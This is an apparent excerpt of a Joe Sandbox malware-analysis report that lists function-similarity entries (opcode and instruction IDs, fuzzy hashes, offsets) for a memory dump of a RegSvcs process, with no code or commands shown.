                                                                  • API String ID:
                                                                  • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                  • Instruction ID: 39cd89f46e6de76555553d002653843c8b9b83541dc648c588248612c12b45a4
                                                                  • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                  • Instruction Fuzzy Hash: 3EF09072611204EEE714DB25CC01F66B6EAEF98744F25C068A545D72A4EAB0DD01C654
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5abb2d7d78b905259b99d640d1982b728a07b11082e5c09aef2a329b21b3f824
                                                                  • Instruction ID: fe7167a5ddea4da045f64a8d9030bf139d76ffb9e17655d0bea4f03ebfd3a865
                                                                  • Opcode Fuzzy Hash: 5abb2d7d78b905259b99d640d1982b728a07b11082e5c09aef2a329b21b3f824
                                                                  • Instruction Fuzzy Hash: 8AF06270A01249DFCB04EFA9C515A5EB7B5FF18300F10806AB955EB395DA38EE01CB94
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0fa4bda975e4a12fe61ec2d098660d6b5442500cfb6882c9c17adf04fa0e39e2
                                                                  • Instruction ID: c1407709326fc31ac60b80d14b1f230af0ed27d9fba3ea88fed0c2becdaf6d07
                                                                  • Opcode Fuzzy Hash: 0fa4bda975e4a12fe61ec2d098660d6b5442500cfb6882c9c17adf04fa0e39e2
                                                                  • Instruction Fuzzy Hash: E4F0B4319166D19FEF32CB5CCF44B21BBDC9B01660F0A4D6AD54A8F602DF24D882C650
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 01b9924cb9aabc61f555e457f891b7aac205141f86539e6f6b23111f5b339126
                                                                  • Instruction ID: 3522b4f1a69afd20a67342829d2b0b6ae7342d8bcf3cf153a12abc0f709f21cf
                                                                  • Opcode Fuzzy Hash: 01b9924cb9aabc61f555e457f891b7aac205141f86539e6f6b23111f5b339126
                                                                  • Instruction Fuzzy Hash: 58F05C2645A6C017CF726B3C74583DDFF55A752324F2A1489FCE05B209D6B48883C366
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8244ed67a58bfc41d27f6319776b9e53017587f6b0abc973c8ed0135764b40cc
                                                                  • Instruction ID: 8409944602ae99a869f28d7a7210038c0891b979b683b11f349586cec9365f46
                                                                  • Opcode Fuzzy Hash: 8244ed67a58bfc41d27f6319776b9e53017587f6b0abc973c8ed0135764b40cc
                                                                  • Instruction Fuzzy Hash: 43F0BE725116719BE3229A2ECA48B31BBD8DB45EA1F08942DD40A87612C364E881CA50
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                  • Instruction ID: 8284b21560537c2436abda9a33af392b1cc7531b98607fe07ce9a504c8e7e1eb
                                                                  • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                  • Instruction Fuzzy Hash: 93E0D8327006412BE7219E598CD0F57776FEFD2B10F04407DB6045F252CAE2DC0986A8
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                  • Instruction ID: cf7ac776eb74f4b2bc350df8d8e57404245a92bae6182d8bf0dc0eee92a029a9
                                                                  • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                  • Instruction Fuzzy Hash: EFF08C721002149FE3218F09D840F62B7B8EB05364F41C06AEA098B161D339EC41DBA4
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                  • Instruction ID: 98a4c2fac84dbc4b5503c15a18e8499c217cfe26442037cfd1601272fb667497
                                                                  • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                  • Instruction Fuzzy Hash: ECF0E53A204741DBDF16DF19D840AA97BECFB45360F040094F8468B301E732E982CF94
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                  • Instruction ID: 313a3c1cc60a338fa8f57f283d775d4bc20945c4ab626bb62ac31f6d89a28064
                                                                  • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                  • Instruction Fuzzy Hash: FBE0D8322441C5ABD3219A9D8C10B7677A6EBD0FA0F15042DEA028B258DF70DC41C7DC
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d93b967a65c2a63fdff878b8c57266a2f3e13db8e35ba0988d69385b1a254ee9
                                                                  • Instruction ID: a36e7f01c4558524d50380d0a5f6739fbf01c6a54f40acf77c18fec84271f5df
                                                                  • Opcode Fuzzy Hash: d93b967a65c2a63fdff878b8c57266a2f3e13db8e35ba0988d69385b1a254ee9
                                                                  • Instruction Fuzzy Hash: 2BF0E531A25591CFE77AD72CD944B52B7EAAB51630F0A1554D80287912C324DC80C690
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                  • Instruction ID: 2a9ae135abf400701b33720073b246ab3517d1a290dfbd2517b1cd792ade3dc5
                                                                  • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                  • Instruction Fuzzy Hash: 19E0DF32A00110BBDB22A7998D01F9ABEADEB90EA0F450058B602E7090E530EE00DAA0
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                  • Instruction ID: f17bd3a8b0bbdfcb9be6b14c2fb36171e34a2b9d0ba878a808381674f850804c
                                                                  • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                  • Instruction Fuzzy Hash: ABE09B316803518FCB25CA1EC144A53F7ECDFF56A0F1980A9ED0547612C271F842C6D0
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 9ad3a8bf46fba0923b99c62818a6d4a4934978ab4fcdcfab38397d576a0f93c8
                                                                  • Instruction ID: a9b200d42c15331589a1b2ca17c0928ae923c337d2879985fbaa84f2457d02f2
                                                                  • Opcode Fuzzy Hash: 9ad3a8bf46fba0923b99c62818a6d4a4934978ab4fcdcfab38397d576a0f93c8
                                                                  • Instruction Fuzzy Hash: D5E09272100594ABC721BB29DD11F8A77ABEF61364F11451DB15557190CB30AC11C7C8
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                  • Instruction ID: af39847d106351e97990f3311a9717ed2560f4afe36219a973c38faccd38d256
                                                                  • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                  • Instruction Fuzzy Hash: FCE09231050611DFE7326F2ECC48B96BAE2FF60711F148C2CA09B125B0C7B598C1CB44
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                  • Instruction ID: 3e02e5e610b8d0e8e32b791e8fd760c86580f20c45349aa4477c411c8fd3579c
                                                                  • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                  • Instruction Fuzzy Hash: 41E0C2343003058FE715CF1EC050B62BBB6BFD5B10F28C0A8A9498F209EB32E882CB40
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3f1eaf07b1dff66a8708616b715c731c0725d726c1c710631473df82521cda41
                                                                  • Instruction ID: 2a7f3a5f9ca75fdad2dc186ab82163f280c25a9e56a7f1dad8e9d9efedfecbcd
                                                                  • Opcode Fuzzy Hash: 3f1eaf07b1dff66a8708616b715c731c0725d726c1c710631473df82521cda41
                                                                  • Instruction Fuzzy Hash: 17D02B324C54306ACB39E15CBC08FF73A5AEB40B20F018868FA0CD2011D524CC8187C8
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                  • Instruction ID: 1fa28b9f7e24165434215248931c88d16d07e0d2e12768ebb3ffab2811b48ed1
                                                                  • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                  • Instruction Fuzzy Hash: FCE0C231801A20EFDB323F15DC20F5176AAFF94B10F508A2DE0820B1A487B0AC82CB88
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0cbb9bda0c965efeafd2c67c0f9d9f2012daceeb4638dd24e427c0ff4d76d0df
                                                                  • Instruction ID: 33c00d1a642b8ab288b02eaf8ef51c97bf57052853bd75c38521ccffd2de5bf9
                                                                  • Opcode Fuzzy Hash: 0cbb9bda0c965efeafd2c67c0f9d9f2012daceeb4638dd24e427c0ff4d76d0df
                                                                  • Instruction Fuzzy Hash: 89E0C2322004A07BC711FB5DDD10F4A73AFEFA5370F104129F15187690CA20AC01C7D8
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                  • Instruction ID: 4c61a1e79456c8753729ead995f4dbabcda257222251726ea1eea4f18b5feb11
                                                                  • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                  • Instruction Fuzzy Hash: 6CD05E36911A50AFC3329F1BEE04C13FBFAFBD4A10705062EA54683A20C770AC06CBA0
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                  • Instruction ID: 37c1778d52053a009944bc5bf797ae127d5f2e477742ee443128c7bd81e50fa2
                                                                  • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                  • Instruction Fuzzy Hash: 1DD0A732504610AFD732AA1CFC00FC373D9BB48720F050459B009C7151C360AC41CA44
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                  • Instruction ID: fd02dbb6349a062aed8f6bfa9b645dbcd085fdb63a3be737acb6c51ba00d2f12
                                                                  • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                  • Instruction Fuzzy Hash: 98E0EC35960784EFDF13DF99CA40F5AFBFABB94B40F150458A1085B660C625AD01CB40
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                  • Instruction ID: 507b413c65391510e30a516e3e81d9559493f9ad94fbc47a26a84a9d6ee84741
                                                                  • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                  • Instruction Fuzzy Hash: D9D02232212030A7CB2866956C00F63B906AB80A94F0A012E380A93A00C1048C43C6E0
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                  • Instruction ID: 12349ed6c80d33a110919ac5cff4fc78ec2cdf44794fc856d56f9cffcf7649a8
                                                                  • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                  • Instruction Fuzzy Hash: BFD012371D054DBBCB119F66DC01F957BAAE764BA0F444020B505875A0C63AE950D984
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3343d1c9b93ca9425ccd29bc3d60f43eb4cae73e63d86b46b553d831791e2229
                                                                  • Instruction ID: b0075cb0c798e7db8b30030cf9c331e26dabbc5c34edb15f9d2bd7a3e577817c
                                                                  • Opcode Fuzzy Hash: 3343d1c9b93ca9425ccd29bc3d60f43eb4cae73e63d86b46b553d831791e2229
                                                                  • Instruction Fuzzy Hash: FBD05230A41202EBDF2BCF88CE14A3EBAB1EB10B40B94006CFA0192220E328DC028A00
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                  • Instruction ID: 6f0233826bb4a4f7482f120f74ebc74e27d367c1b6753e1d75716541176ac13c
                                                                  • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                  • Instruction Fuzzy Hash: E6D09235212A80CFD62A8B0DC9A4B1633A4BB45A44FC14490E501CBB22D728D940CE00
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                  • Instruction ID: 1ea0a8f021bf6599a2e6bd7cf9a3933f58f229224c4d82b6ab89f9170219a06a
                                                                  • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                  • Instruction Fuzzy Hash: 5AC01232150644AFC7119A95CD01F0177AAE798B40F400021F20547670C531EC10DA44
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                  • Instruction ID: df967131ed8df3e1bd40a224c11ac22fc82bcf0fca52918fa936e8b3caedd114
                                                                  • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                  • Instruction Fuzzy Hash: 8BD01236100249EFCB11DF41C890D9B7B3BFBD8710F108019FD19076108A31ED62DB50
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                  • Instruction ID: 18034b5f5b9d72f35d236eec745c8ea3b89080c82d352b34b6452e916e0ccc12
                                                                  • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                  • Instruction Fuzzy Hash: 61C002756019418BCF15DA59D694A4577E4B754740F151890E8058B721E624E811CA10
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9e201d4ceb194298e69fe52079980d6874a95bcbcd5165a112813397d31d0078
                                                                  • Instruction ID: 40bcdfbd4ea1c420813955d6001ae75c38ceeaf954177ef336399aaa7c61bab8
                                                                  • Opcode Fuzzy Hash: 9e201d4ceb194298e69fe52079980d6874a95bcbcd5165a112813397d31d0078
                                                                  • Instruction Fuzzy Hash: 5C900231606800129140755C4C885474049A7E0301B55C111E4424A54DCA148A565361
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7bd6c29091166d82cb929dce3ae3ee7901cff0b4b06d95e9d85b87bcfafbac0b
                                                                  • Instruction ID: 82ef257d0559fb3a29e9a6cd60a2fe59b7c60188afab8968266e96ae2a3277ec
                                                                  • Opcode Fuzzy Hash: 7bd6c29091166d82cb929dce3ae3ee7901cff0b4b06d95e9d85b87bcfafbac0b
                                                                  • Instruction Fuzzy Hash: D4900261602500424140755C4C084076049A7E1301395C215A4554A60DC61889559369
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 80b18b0b45cbc55f33d1a20ef647c86597763d1fa1f713f5d3d928ccd64936d2
                                                                  • Instruction ID: 67a364fe8e14ed5632886f95e86cd4f5d87f07dfc5b7f13aaae13740efc2225f
                                                                  • Opcode Fuzzy Hash: 80b18b0b45cbc55f33d1a20ef647c86597763d1fa1f713f5d3d928ccd64936d2
                                                                  • Instruction Fuzzy Hash: B190023120644842D140755C4808A47005997D0305F55C111A4064B94ED6258E55B761
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 03b96bd9e863b764da47ca1fbe5c551c0afb9cddf6c05b7b7ad146922667eb14
                                                                  • Instruction ID: c3a34b5f254555c36356b5217c86ff3a484bd86302627ff31b4562c86115bac1
                                                                  • Opcode Fuzzy Hash: 03b96bd9e863b764da47ca1fbe5c551c0afb9cddf6c05b7b7ad146922667eb14
                                                                  • Instruction Fuzzy Hash: B090023120240802D180755C480864B004997D1301F95C115A4025B54ECA158B5977A1
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3bc0e7f99ed547afdb9ee535f14e05024088ccca2043765598ec2e678ec6323b
                                                                  • Instruction ID: 232d4d706690b32cc14004843a87c5bee3c5946ef354eaa3bde78fae63c9391a
                                                                  • Opcode Fuzzy Hash: 3bc0e7f99ed547afdb9ee535f14e05024088ccca2043765598ec2e678ec6323b
                                                                  • Instruction Fuzzy Hash: 4390023160640802D150755C4818747004997D0301F55C111A4024B54EC7558B5577A1
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7187728e15e17815217ff1df34aeb507cdf1407003297e2e73d3058eb829744e
                                                                  • Instruction ID: 040f88c164f44f4adfd2eb92ce1a59921d1d4e6edc326dfb892bbf0a81c6ffa9
                                                                  • Opcode Fuzzy Hash: 7187728e15e17815217ff1df34aeb507cdf1407003297e2e73d3058eb829744e
                                                                  • Instruction Fuzzy Hash: F790023120240802D104755C4C08687004997D0301F55C111AA024B55FD66589917231
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3c76e2a17af96bb59a031fa4948262964c8d34d92207cac6840a6efb0bb9a95d
                                                                  • Instruction ID: f6fe2125959c0eff1d856123e2189a418f0e19c6616de5229c81eea04104cfbd
                                                                  • Opcode Fuzzy Hash: 3c76e2a17af96bb59a031fa4948262964c8d34d92207cac6840a6efb0bb9a95d
                                                                  • Instruction Fuzzy Hash: E3900225222400020145B95C0A0850B0489A7D6351395C115F5416A90DC62189655321
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
